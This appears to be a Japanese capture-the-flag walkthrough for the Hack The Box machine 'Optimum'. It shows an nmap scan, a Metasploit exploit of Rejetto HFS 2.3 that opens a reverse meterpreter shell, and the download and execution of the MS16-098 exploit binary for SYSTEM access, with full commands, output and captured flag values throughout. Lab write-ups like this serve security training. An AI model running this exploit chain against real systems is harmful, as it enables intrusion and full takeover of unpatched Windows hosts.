今回はポートを2つ開けた
docker run -p 1234:1234 -p 8080:8080 -t -i htb /bin/bash
hfsが動作していることがわかる
# nmap -A -n -F -T5 optimum.htb Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-05 14:29 UTC Nmap scan report for optimum.htb (10.10.10.8) Host is up (0.042s latency). Not shown: 99 filtered ports PORT STATE SERVICE VERSION 80/tcp open http HttpFileServer httpd 2.3 |_http-server-header: HFS 2.3 |_http-title: HFS / Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: print server|printer Running: HP embedded OS CPE: cpe:/h:hp:jetdirect_170x cpe:/h:hp:inkjet_3000 OS details: HP 170X print server or Inkjet 3000 printer, HP LaserJet 4250 printer Network Distance: 2 hops Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
msfconsoleでhfsの脆弱性を攻める
# msfconsole
.;lxO0KXXXK0Oxl:.
,o0WMMMMMMMMMMMMMMMMMMKd,
'xNMMMMMMMMMMMMMMMMMMMMMMMMMWx,
:KMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMK:
.KMMMMMMMMMMMMMMMWNNNWMMMMMMMMMMMMMMMX,
lWMMMMMMMMMMMXd:.. ..;dKMMMMMMMMMMMMo
xMMMMMMMMMMWd. .oNMMMMMMMMMMk
oMMMMMMMMMMx. dMMMMMMMMMMx
.WMMMMMMMMM: :MMMMMMMMMM,
xMMMMMMMMMo lMMMMMMMMMO
NMMMMMMMMW ,cccccoMMMMMMMMMWlccccc;
MMMMMMMMMX ;KMMMMMMMMMMMMMMMMMMX:
NMMMMMMMMW. ;KMMMMMMMMMMMMMMX:
xMMMMMMMMMd ,0MMMMMMMMMMK;
.WMMMMMMMMMc 'OMMMMMM0,
lMMMMMMMMMMk. .kMMO'
dMMMMMMMMMMWd' ..
cWMMMMMMMMMMMNxc'. ##########
.0MMMMMMMMMMMMMMMMWc #+# #+#
;0MMMMMMMMMMMMMMMo. +:+
.dNMMMMMMMMMMMMo +#++:++#+
'oOWMMMMMMMMo +:+
.,cdkO0K; :+: :+:
:::::::+:
Metasploit
=[ metasploit v5.0.100-dev ]
+ -- --=[ 2046 exploits - 1106 auxiliary - 344 post ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
Metasploit tip: You can upgrade a shell to a Meterpreter session on many platforms using sessions -u <session_id>
msf5 > search hfs
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/git_client_command_exec 2014-12-18 excellent No Malicious Git and Mercurial HTTP Server For CVE-2014-9390
1 exploit/windows/http/rejetto_hfs_exec 2014-09-11 excellent Yes Rejetto HttpFileServer Remote Command Execution
Interact with a module by name or index, for example use 1 or use exploit/windows/http/rejetto_hfs_exec
msf5 > use 1
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf5 exploit(windows/http/rejetto_hfs_exec) > show options
Module options (exploit/windows/http/rejetto_hfs_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
HTTPDELAY 10 no Seconds to wait before terminating web server
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes The path of the web application
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 172.17.0.2 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf5 exploit(windows/http/rejetto_hfs_exec) > set RHOSTS optimum.htb
RHOSTS => optimum.htb
msf5 exploit(windows/http/rejetto_hfs_exec) > set LHOST 10.10.14.6
LHOST => 10.10.14.14
msf5 exploit(windows/http/rejetto_hfs_exec) > set LPORT 1234
LPORT => 1234
msf5 exploit(windows/http/rejetto_hfs_exec) > exploit
[-] Handler failed to bind to 10.10.14.14:1234:- -
[*] Started reverse TCP handler on 0.0.0.0:1234
[*] Using URL: http://0.0.0.0:8080/JaNzZ3CB
[*] Local IP: http://172.17.0.2:8080/JaNzZ3CB
[*] Server started.
[*] Sending a malicious request to /
/usr/share/metasploit-framework/modules/exploits/windows/http/rejetto_hfs_exec.rb:110: warning: URI.escape is obsolete
/usr/share/metasploit-framework/modules/exploits/windows/http/rejetto_hfs_exec.rb:110: warning: URI.escape is obsolete
[*] Payload request received: /JaNzZ3CB
[*] Sending stage (176195 bytes) to 172.17.0.1
[*] Meterpreter session 1 opened (172.17.0.2:1234 -> 172.17.0.1:46836) at 2020-08-05 16:23:53 +0000
[*] Server stopped.
[!] This exploit may require manual cleanup of '%TEMP%\ZOcsozkNyOEfb.vbs' on the target
meterpreter >
[!] Tried to delete %TEMP%\ZOcsozkNyOEfb.vbs, unknown result
getuid
Server username: OPTIMUM\kostas
meterpreter > shell
Process 1324 created.
Channel 2 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Users\kostas\Desktop>type user.txt.txt
type user.txt.txt
d0c39409d7b994a9a1389ebf38ef5f73
Windows-Exploit-Suggesterを利用して、脆弱性を調べる
meterpreter > execute -f "cmd.exe /c systeminfo > systeminfo.txt" Process 3604 created. meterpreter > download systeminfo.txt [*] Downloading: systeminfo.txt -> systeminfo.txt [*] Downloaded 3.26 KiB of 3.26 KiB (100.0%): systeminfo.txt -> systeminfo.txt [*] download : systeminfo.txt -> systeminfo.txt meterpreter > bg [*] Backgrounding session 1.. msf5 exploit(windows/http/rejetto_hfs_exec) > git clone https://github.com/GDSSecurity/Windows-Exploit-Suggester.git [*] exec: git clone https://github.com/GDSSecurity/Windows-Exploit-Suggester.git Cloning into 'Windows-Exploit-Suggester'... remote: Enumerating objects: 120, done. remote: Total 120 (delta 0), reused 0 (delta 0), pack-reused 120 Receiving objects: 100% (120/120), 169.26 KiB | 365.00 KiB/s, done. Resolving deltas: 100% (72/72), done. msf5 exploit(windows/http/rejetto_hfs_exec) > cd Windows-Exploit-Suggester/ msf5 exploit(windows/http/rejetto_hfs_exec) > python2 windows-exploit-suggester.py --update msf5 exploit(windows/http/rejetto_hfs_exec) > python2 windows-exploit-suggester.py --database 2020-08-08-mssb.xls --systeminfo systeminfo.txt --quiet [*] exec: python2 windows-exploit-suggester.py --database 2020-08-08-mssb.xls --systeminfo systeminfo.txt --quiet [*] initiating winsploit version 3.3... [*] database file detected as xls or xlsx based on extension [-] please install and upgrade the python-xlrd library msf5 exploit(windows/http/rejetto_hfs_exec) > apt install python-pip msf5 exploit(windows/http/rejetto_hfs_exec) > python -m pip install xlrd --upgrade ... Installing collected packages: xlrd Successfully installed xlrd-1.2.0 msf5 exploit(windows/http/rejetto_hfs_exec) > vi systeminfo.txt ※一部文字化けしていてうまく処理できなかったため、化けた部分を削除した※ msf5 exploit(windows/http/rejetto_hfs_exec) > python2 windows-exploit-suggester.py --database 2020-08-08-mssb.xls --systeminfo systeminfo.txt --quiet [*] exec: python2 windows-exploit-suggester.py --database 2020-08-08-mssb.xls --systeminfo systeminfo.txt --quiet [*] initiating winsploit version 3.3... [*] database file detected as xls or xlsx based on extension [*] attempting to read from the systeminfo input file [+] systeminfo input file read successfully (utf-8) [*] querying database file for potential vulnerabilities [*] comparing the 32 hotfix(es) against the 266 potential bulletins(s) with a database of 137 known exploits [*] there are now 246 remaining vulns [+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin [+] windows version identified as 'Windows 2012 R2 64-bit' [*] [E] MS16-135: Security Update for Windows Kernel-Mode Drivers (3199135) - Important [E] MS16-098: Security Update for Windows Kernel-Mode Drivers (3178466) - Important [M] MS16-075: Security Update for Windows SMB Server (3164038) - Important [E] MS16-074: Security Update for Microsoft Graphics Component (3164036) - Important [E] MS16-063: Cumulative Security Update for Internet Explorer (3163649) - Critical [E] MS16-032: Security Update for Secondary Logon to Address Elevation of Privile (3143141) - Important [M] MS16-016: Security Update for WebDAV to Address Elevation of Privilege (3136041) - Important [E] MS16-014: Security Update for Microsoft Windows to Address Remote Code Execution (3134228) - Important [E] MS16-007: Security Update for Microsoft Windows to Address Remote Code Execution (3124901) - Important [E] MS15-132: Security Update for Microsoft Windows to Address Remote Code Execution (3116162) - Important [E] MS15-112: Cumulative Security Update for Internet Explorer (3104517) - Critical [E] MS15-111: Security Update for Windows Kernel to Address Elevation of Privilege (3096447) - Important [E] MS15-102: Vulnerabilities in Windows Task Management Could Allow Elevation of Privilege (3089657) - Important [E] MS15-097: Vulnerabilities in Microsoft Graphics Component Could Allow Remote Code Execution (3089656) - Critical [M] MS15-078: Vulnerability in Microsoft Font Driver Could Allow Remote Code Execution (3079904) - Critical [E] MS15-052: Vulnerability in Windows Kernel Could Allow Security Feature Bypass (3050514) - Important [M] MS15-051: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (3057191) - Important [E] MS15-010: Vulnerabilities in Windows Kernel-Mode Driver Could Allow Remote Code Execution (3036220) - Critical [E] MS15-001: Vulnerability in Windows Application Compatibility Cache Could Allow Elevation of Privilege (3023266) - Important [E] MS14-068: Vulnerability in Kerberos Could Allow Elevation of Privilege (3011780) - Critical [M] MS14-064: Vulnerabilities in Windows OLE Could Allow Remote Code Execution (3011443) - Critical [M] MS14-060: Vulnerability in Windows OLE Could Allow Remote Code Execution (3000869) - Important [M] MS14-058: Vulnerabilities in Kernel-Mode Driver Could Allow Remote Code Execution (3000061) - Critical [E] MS13-101: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2880430) - Important [M] MS13-090: Cumulative Security Update of ActiveX Kill Bits (2900986) - Critical [*] done
MS16-098を起点にして、administrator権限を奪取する
「MS16-098 exploit」で検索して、exploitを見つける。
msf5 exploit(windows/http/rejetto_hfs_exec) > wget -d https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe msf5 exploit(windows/http/rejetto_hfs_exec) > sessions Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 meterpreter x86/windows OPTIMUM\kostas @ OPTIMUM 172.17.0.2:1234 -> 172.17.0.1:48926 (10.10.10.8) msf5 exploit(windows/http/rejetto_hfs_exec) > sessions -i 1 [*] Starting interaction with 1... meterpreter > upload 41020.exe [*] uploading : 41020.exe -> 41020.exe [*] Uploaded 547.00 KiB of 547.00 KiB (100.0%): 41020.exe -> 41020.exe [*] uploaded : 41020.exe -> 41020.exe meterpreter > shell Process 1100 created. Channel 5 created. Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved. C:\Users\kostas\Desktop>41020.exe 41020.exe Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved. C:\Users\kostas\Desktop>whoami whoami nt authority\system C:\Users\kostas\Desktop>type C:\Users\Administrator\Desktop\root.txt type C:\Users\Administrator\Desktop\root.txt 51ed1b36553c8461f4552c2e92b3eeed